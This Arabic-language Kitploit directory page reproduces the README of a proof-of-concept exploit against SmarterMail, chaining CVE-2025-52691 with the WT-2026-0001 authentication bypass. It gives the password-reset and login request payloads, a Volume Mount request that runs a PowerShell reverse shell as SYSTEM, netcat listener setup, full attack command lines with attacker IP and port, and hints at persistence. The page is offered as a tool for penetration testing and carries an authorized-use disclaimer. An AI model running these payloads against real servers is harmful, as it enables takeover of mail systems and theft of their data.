Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/ninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالفريق الأحمرأداة الوصول عن بعد
GitHubninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001

CVE-2025-52691-PoC-SmarterMail-authentication-bypass-exploit-WT-2026-0001

CVE-2025-52691 PoC: استنادًا إلى مقال watchtowr WT-2026-0001 حول استغلال تجاوز المصادقة، هذا سكربت هجوم Python عملي.

عرض المستودع
7منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2025-52691 / WT-2026-0001 SmarterMail

🚨 إشعار مهم

هذه الأداة مخصصة لاختبار الأمان المصرح به والأغراض التعليمية فقط!

  • الاستخدام غير المصرح به غير قانوني وغير أخلاقي
  • استخدم فقط على الأنظمة التي لديها تفويض صريح
  • استخدم على مسؤوليتك الخاصة
  • المستخدمون مسؤولون عن الامتثال لجميع القوانين المعمول بها

📋 نظرة عامة

يجمع هذا الاستغلال بين ثغرتين حرجتين في SmarterMail:

  1. CVE-2025-52691: تنفيذ التعليمات البرمجية عن بُعد قبل المصادقة عبر رفع الملفات
    • درجة CVSS: 10.0 (حرجة)
    • الإصدارات المتأثرة: Build 9406 والإصدارات الأقدم، Build 16.3.6989.16341 والإصدارات الأقدم
    • الإصدارات المُصححة: Build 9413 والإصدارات الأحدث

https://github.com/watchtowrlabs/watchTowr-vs-SmarterMail-CVE-2025-52691

  1. WT-2026-0001: تجاوز المصادقة عبر إعادة تعيين كلمة المرور
    • لم يتم تعيين CVE-ID
    • الإصدارات المتأثرة: حتى Build 9510
    • الإصدارات المُصححة: Build 9511 (15 يناير 2026)

https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/

متجه الهجوم

ينفذ الاستغلال هجومًا من 3 مراحل:

  1. المرحلة 1: تجاوز المصادقة عبر WT-2026-0001

    • تغيير كلمة مرور المسؤول دون التحقق من كلمة المرور القديمة
  2. المرحلة 2: تسجيل دخول المسؤول بكلمة المرور الجديدة

    • المصادقة على واجهة ويب SmarterMail
  3. المرحلة 3: تنفيذ التعليمات البرمجية عن بُعد عبر وظيفة Volume Mounts

    • إنشاء Volume Mount مع أمر Reverse Shell
    • تنفيذ أوامر نظام التشغيل بصلاحيات SYSTEM

المتطلبات الأساسية

متطلبات النظام

  • Python 3.6+
  • Netcat (nc)
  • curl
  • Linux/macOS/Windows (WSL)

تعليمات التثبيت

root@kitploit:~
# Install Python 3 (if not available)
# Ubuntu/Debian
sudo apt update && sudo apt install python3 python3-pip

# macOS
brew install python3

# Windows (WSL)
wsl --install

# Install netcat
# Ubuntu/Debian
sudo apt install netcat

# macOS
brew install netcat

# Windows (WSL)
sudo apt install netcat-traditional

تثبيت التبعيات

root@kitploit:~
# Python dependencies (if needed)
pip3 install requests

البدء السريع

الطريقة 1: الإعداد الآلي (موصى به)

root@kitploit:~
# Make executable
chmod +x run_exploit.sh

# Automated setup
./run_exploit.sh --auto

# Or interactive setup
./run_exploit.sh

الطريقة 2: التنفيذ المباشر

root@kitploit:~
# Setup listener (in one terminal)
nc -lvnp 4444

# Run exploit (in a second terminal)
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

الطريقة 3: مع جميع الخيارات

root@kitploit:~
python3 exploit.py \
  -H http://192.168.1.100 \
  -P 9998 \
  -A 192.168.1.50 \
  -p 4444 \
  -d \
  --admin-username admin \
  --new-password "MySecurePassword123!"

تعليمات مفصلة

الخطوة 1: التحضير

  1. تحديد الهدف

    root@kitploit:~
    # Check target host
    curl -I http://192.168.1.100:9998
    
    # Identify SmarterMail version
    # (Usually in login page or HTTP headers)
    
  2. إعداد المستمع

    root@kitploit:~
    # In Terminal 1: Start listener
    nc -lvnp 4444
    
    # The listener must be running before the exploit is executed
    
  3. التحقق من الشبكة

    root@kitploit:~
    # Ensure connection between attacker and target is possible
    ping 192.168.1.100
    nc -zv 192.168.1.100 9998
    

الخطوة 2: تنفيذ الاستغلال

root@kitploit:~
# With the runner script (recommended)
./run_exploit.sh

# Or directly with Python
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

الخطوة 3: بعد الاستغلال

  1. الاتصال بالصدفة (Shell)

    root@kitploit:~
    # In the listener terminal, a connection should now appear
    # You should have a SYSTEM shell
    
  2. التحقق من الوصول

    root@kitploit:~
    # In the obtained shell
    whoami
    hostname
    ipconfig /all  # Windows
    ifconfig       # Linux
    
  3. الوصول الدائم

    root@kitploit:~
    # Optional: Set up persistence
    # Windows: Install as service
    # Linux: Cron job or systemd service
    

🔧 خيارات التكوين

معلمات Exploit.py

المعلمةالوصفالقيمة الافتراضية
-H, --hostالمضيف الهدف (مطلوب)-
-P, --portمنفذ الهدف9998
-A, --attacker-ipعنوان IP للمهاجم للاتصال العكسي (مطلوب)-
-p, --attacker-portمنفذ المهاجم للاتصال العكسي (مطلوب)-
-d, --debugتفعيل وضع التصحيحFalse
--admin-usernameاسم مستخدم المسؤولadmin
--new-passwordكلمة مرور المسؤول الجديدةNewPassword123!@#

معلمات Run_Exploit.sh

المعلمةالوصف
-t, --targetالمضيف الهدف
-p, --portمنفذ الهدف
-a, --attacker-ipعنوان IP للمهاجم
-l, --listener-portمنفذ المستمع
-n, --new-passwordكلمة مرور المسؤول الجديدة
-u, --admin-userاسم مستخدم المسؤول
-d, --debugوضع التصحيح
--autoالوضع الآلي

أمثلة

المثال 1: الاستخدام الأساسي

root@kitploit:~
# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Run exploit
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

المثال 2: مع بيانات اعتماد مخصصة

root@kitploit:~
python3 exploit.py \
  -H https://mail.company.com \
  -P 443 \
  -A 10.0.0.1 \
  -p 8080 \
  --admin-username administrator \
  --new-password "ComplexPassword123!@#"

المثال 3: وضع التصحيح

root@kitploit:~
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d

المثال 4: الإعداد الآلي

root@kitploit:~
./run_exploit.sh --auto

التفاصيل التقنية

المرحلة 1: تجاوز المصادقة

نقطة النهاية: POST /api/v1/auth/force-reset-password

الحمولة:

root@kitploit:~
{
  "IsSysAdmin": "true",
  "OldPassword": "dummy",
  "Username": "admin",
  "NewPassword": "NewPassword123!@#",
  "ConfirmPassword": "NewPassword123!@#"
}

استجابة النجاح:

root@kitploit:~
{
  "success": true,
  "resultCode": 200,
  "debugInfo": "check1\r\ncheck2\r\ncheck3\r\ncheck4.2\r\ncheck5.2\r\ncheck6.2\r\ncheck7.2\r\ncheck8.2\r\n"
}

المرحلة 2: تسجيل دخول المسؤول

نقطة النهاية: POST /api/v1/auth/login

الحمولة:

root@kitploit:~
{
  "username": "admin",
  "password": "NewPassword123!@#"
}

المرحلة 3: تنفيذ التعليمات البرمجية عن بُعد عبر Volume Mounts

نقطة النهاية: POST /api/v1/settings/volume-mounts

الحمولة:

root@kitploit:~
{
  "name": "random_volume_name",
  "path": "C:\\Temp\\random_volume_name",
  "command": "powershell reverse shell command",
  "enabled": true,
  "type": "command"
}

استكشاف الأخطاء وإصلاحها

المشكلات الشائعة

1. المنفذ محظور

root@kitploit:~
# Error: "Connection refused"
# Solution: Check firewall and open port
sudo ufw allow 9998

2. المستمع لا يمكن الوصول إليه

root@kitploit:~
# Error: "Connection failed"
# Solution: Check listener setup
nc -lvnp 4444

3. فشلت المصادقة

root@kitploit:~
# Error: "Login failed"
# Solution: Check target version (must be vulnerable)

5. فشل تنفيذ التعليمات البرمجية عن بُعد

root@kitploit:~
# Error: "Volume mount creation failed"
# Solution: Check admin privileges, target system

وضع التصحيح

فعّل وضع التصحيح للحصول على مخرجات مفصلة:

root@kitploit:~
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d

⚠️ ملاحظات أمنية

الجوانب القانونية

  • قم بإجراء الاختبارات المصرح بها فقط
  • احصل على إذن كتابي
  • تأكد من الامتثال للقوانين المحلية
  • لا تختبر على أنظمة الإنتاج

الاحتياطات الأمنية

  1. بيئة الاختبار: اختبر دائمًا في بيئات خاضعة للتحكم
  2. التحقق من الهدف: تأكد من أن الهدف هو نظام اختبار
  3. عزل الشبكة: افصل أنظمة الاختبار عن شبكة الإنتاج
  4. التوثيق: وثّق جميع الاختبارات
  5. التنظيف: أزل جميع الآثار بعد الاختبار

الاستخدام المسؤول

  • لا تسبب ضررًا
  • لا تسرق البيانات أو تتلاعب بها
  • لا تعطل الأنظمة
  • كن شفافًا مع الأطراف المسؤولة

التحديثات والصيانة

ملاحظات الإصدار

  • v1.0: الإصدار الأولي بوظائف كاملة
  • التحديثات المستقبلية: تحسينات في معالجة الأخطاء والاستقرار

🙏 شكر وتقدير

  • watchTowr Labs للبحث الأصلي
  • مجتمع أبحاث الأمان للدعم
  • كل من ساهم في التحسينات

⚠️ تذكر: القوة العظيمة تأتي مع مسؤولية عظيمة!

تنزيل الأداة